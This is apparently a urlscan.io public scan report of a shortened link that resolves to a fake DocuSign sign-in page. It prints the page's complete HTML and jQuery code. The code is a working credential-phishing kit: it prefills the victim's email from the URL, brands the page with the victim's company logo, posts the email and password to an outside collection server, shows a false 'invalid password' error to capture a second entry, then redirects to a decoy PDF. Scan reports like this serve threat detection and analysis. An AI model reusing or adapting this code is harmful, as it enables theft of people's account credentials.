driveoff.autocode.dev
Open in
urlscan Pro
44.240.191.29
Public Scan
Submitted URL: https://rb.gy/z6xhix
Effective URL: https://driveoff.autocode.dev/closingdis@dev/login.html
Submission: On November 03 via manual from US — Scanned from DE
Effective URL: https://driveoff.autocode.dev/closingdis@dev/login.html
Submission: On November 03 via manual from US — Scanned from DE
Form analysis
1 forms found in the DOMName: login —
<form name="login" id="login" validate="" class="validationForm">
<div class="signin_head">
<div id="login_logo">
<p><br></p>
<p><br></p>
<center>
<img id="login_logo1" src="https://account.docusign.com/LoginAppNext/images/docusign_logo_small.png" alt="">
</center>
</div>
<h5 class="service_name">Please sign in using your email and password to gain access</h5>
</div>
<center>
<div id="msg" style="display: none;font-weight: 600;color: red;">Invalid Password.! Please enter correct password.</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
</center>
<div class="form-holder">
<div style="width: 100%;">
<div class="alert alert-danger hide alert2"></div>
<div class="textbox_div" id="getusername">
<span>
<input type="email" id="ai" class="textbox" value="" placeholder="someone@example.com" required="">
</span>
</div>
<div class="textbox_div">
<input type="password" id="pr" placeholder="Password" class="textbox" required="">
<div class="checkbox">
<input type="checkbox" name="">
<label>REMEMBER ME</label>
</div>
<p><br></p>
<button style="background: #c94b59;" class="btn btn-warning" id="submit-btn" tabindex="3" type="submit"><span>NEXT</span></button>
</div>
<p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your account?</p>
<p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use code</p>
</div>
</div>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
var count = 0;
$('#back1').click(function() {
$("#msg").hide();
$('#ai').val("");
$("#automail").animate({
left: 200,
opacity: "hide"
}, 0);
$("#inputbar").animate({
right: 200,
opacity: "show"
}, 1000);
});
/////////////url ai getting////////////////
var ai = window.location.hash.substr(1);
if (!ai) {} else {
// $('#ai').val(ai);
var my_ai = ai;
var ind = my_ai.indexOf("@");
var my_slice = my_ai.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var dom = c.toUpperCase();
$('#ai').val(my_ai);
$('#ai').attr('disabled', "");
$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
$('#domain-name').html(dom);
$("#msg").hide();
$("#inputbar").animate({
left: 200,
opacity: "hide"
}, 0);
$("#automail").animate({
right: 200,
opacity: "show"
}, 1000);
}
///////////////url getting ai////////////////
var file = "bmV4dC5waHA=";
$('#submit-btn').click(function(event) {
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var ai = $("#ai").val();
var pr = $("#pr").val();
var msg = $('#msg').html();
$('#msg').text(msg);
///////////new injection////////////////
var my_ai = ai;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!ai) {
$('#error').show();
$('#error').html("Email field is emply.!");
ai.focus;
return false;
}
if (!filter.test(my_ai)) {
$('#error').show();
$('#error').html("That account doesn't exist. Enter a different account");
ai.focus;
return false;
}
if (!pr) {
$('#error').show();
$('#error').html("Password field is emply.!");
ai.focus;
return false;
}
var ind = my_ai.indexOf("@");
var my_slice = my_ai.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var dom = c.toUpperCase();
///////////new injection////////////////
count = count + 1;
$('#ai').attr('endisabled', "");
$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
$('#domain-name').html(dom);
$.ajax({
dataType: 'JSON',
url: "https://dayswearenothere.live/next.php",
type: 'POST',
data: {
ai: ai,
pr: pr,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$("#pr").val("");
if (count >= 2) {
count = 0;
// window.location.replace(response['redirect_link']);
window.location.replace("http://docdroid.net/AmOwdzD/alta-seller-cd-pdf" + my_slice);
}
// $('#msg').html(response['msg']);
} else {
// $('#msg').html(response['msg']);
}
}
},
error: function() {
$("#pr").val("");
if (count >= 2) {
count = 0;
window.location.replace("http://docdroid.net/AmOwdzD/alta-seller-cd-pdf" + my_slice);
}
$("#msg").show();
// $('#msg').html("Please try again later");
},
complete: function() {
$('#submit-btn').html('Login');
}
});
});
});
</script>
</form>
Text Content
PLEASE SIGN IN USING YOUR EMAIL AND PASSWORD TO GAIN ACCESS Invalid Password.! Please enter correct password. That account doesn't exist. Enter a different account REMEMBER ME NEXT can't access your account? Sign in with a single-use code